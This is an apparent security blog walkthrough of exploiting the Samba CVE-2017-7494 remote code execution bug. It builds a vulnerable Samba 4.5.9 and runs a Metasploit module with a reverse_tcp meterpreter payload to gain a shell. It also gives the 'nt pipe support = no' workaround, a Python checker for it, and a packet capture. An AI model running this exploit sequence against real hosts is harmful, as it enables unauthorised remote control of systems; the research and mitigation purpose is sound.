Samba is_known_pipename() CVE-2017-7494 in-the-wild vulnerability exploitation

It looks like a spree of critical bugs has lately been giving many sleepless nights to product vendors and researchers! WannaCry is not over yet, and then came Adylkuzz. While people are busy fixing their networks for those, yet another Samba bug has arrived that can have a devastating impact on end users. The flaw is triggered when an arbitrary shared library is loaded, which leads to a nice remote code execution in the context of the target application. The bug is extremely simple to reproduce via a one-liner using Metasploit (as per HD Moore's tweet). Here I explain how to exploit this vulnerability on a standard Ubuntu installation and how you can pop a meterpreter session on the target machine. To reproduce this bug I used the following:

- Ubuntu 16.04
- Metasploit Framework
- Exploit Module (https://goo.gl/g6e8OU)
- Samba v4.5.9 (one of the vulnerable versions)

Let's walk through how to exploit this bug using Metasploit. After the sequence of commands, I've shared a few images and some packet traces (pcaps) of the attack session. These should help security researchers come up with the right protections for their corporate products. Let's get started.

Set up an exploitable Samba:

$ssh user@target_ip
$cd ~/Desktop
$wget -c "https://download.samba.org/pub/samba/stable/samba-4.5.9.tar.gz"
$tar -zxvf samba-4.5.9.tar.gz
$cd samba-4.5.9
$./configure && make # You need to install libraries here, if required
$sudo make install

#Verify the target version
$./bin/smbd -V

#Start the samba listener (without running as a daemon) with more debug info
# You may choose the smb.conf which is already present inside testdata directory
$sudo ./bin/smbd -i --debuglevel=6 --configfile=./testdata/samba3/smb.conf

Run this set of commands on the attacker host:

$cd ~/metasploit-framework/
$git pull
$./msfconsole
use exploit/linux/samba/is_known_pipename  
show options  
set payload windows/meterpreter/reverse_tcp  
set rhost <target_ip>  
exploit  
boom!! # Enjoy your popped meterpreter session ;)  

Below are some screenshots of the exploit run that you can refer to as well:

Step 01: Launch msfconsole and choose the exploit
Step 02: Check the target IP and Samba version
Step 03: Start the Samba listener for exploitation
Step 04: Set the payload and launch the exploit!
Step 05: Popped shell (meterpreter)!!

Needless to say, this bug can be critical and devastating in a real-world environment. If you don't have an appropriate fix, you can apply a temporary workaround by adding the following to the [global] section of smb.conf:

nt pipe support = no  
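
To confirm the workaround is actually in effect, the following Python parses smb.conf text and reports whether `nt pipe support` is disabled in [global]. It is an added example and not part of the original post. The function name and both sample configurations are constructed for illustration.

```python
import re

# Values Samba accepts as boolean false / true (case-insensitive).
FALSE_VALUES = {"no", "false", "0", "off"}
TRUE_VALUES = {"yes", "true", "1", "on"}

# Constructed sample configurations, not taken from the original post.
SAMPLE_OK = "[global]\n  workgroup = EXAMPLE\n  NT Pipe Support = No\n[share]\n  path = /srv/share\n"
SAMPLE_MISPLACED = "[global]\n  workgroup = EXAMPLE\n[share]\n  nt pipe support = no\n"


def check_nt_pipe_workaround(conf_text):
    """Return (applied, reason) for the 'nt pipe support = no' workaround."""
    section = ""      # current section name, lower-cased
    value = None      # last value assigned inside [global]; the last one wins
    misplaced = []    # other sections where the parameter was found
    text = re.sub(r"\\\r?\n", "", conf_text)  # join backslash-continued lines
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":       # blank line or comment
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            section = header.group(1).strip().lower()
            continue
        name, sep, val = line.partition("=")
        # Parameter names are case-insensitive and ignore embedded whitespace.
        if not sep or re.sub(r"\s+", "", name).lower() != "ntpipesupport":
            continue
        if section == "global":
            value = val.strip().lower()
        else:
            misplaced.append(section or "no section")
    if value in FALSE_VALUES:
        return True, "disabled in [global]"
    if value in TRUE_VALUES:
        return False, "explicitly enabled in [global]"
    if value is not None:
        return False, "unrecognised value in [global]: " + value
    if misplaced:
        # Conservative: only an assignment in [global] counts as applied.
        return False, "set outside [global], in: " + ", ".join(misplaced)
    return False, "not set, so the default (yes) applies"


if __name__ == "__main__":
    for label, conf in (("ok", SAMPLE_OK), ("misplaced", SAMPLE_MISPLACED)):
        print(label, check_nt_pipe_workaround(conf))
```

The parser does not follow `include` directives, so compare its result with the output of `testparm -s` on the host when the configuration is split across files.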

Additionally, there are some ITW Python-based proofs of concept. Make sure you have a vulnerable version along with the patched impacket if you want to reproduce the Python exploit variant.


Packet capture: You can download the packet capture of this attack session for your further analysis from here. This should be helpful for some security researchers out there!




Peace!!..
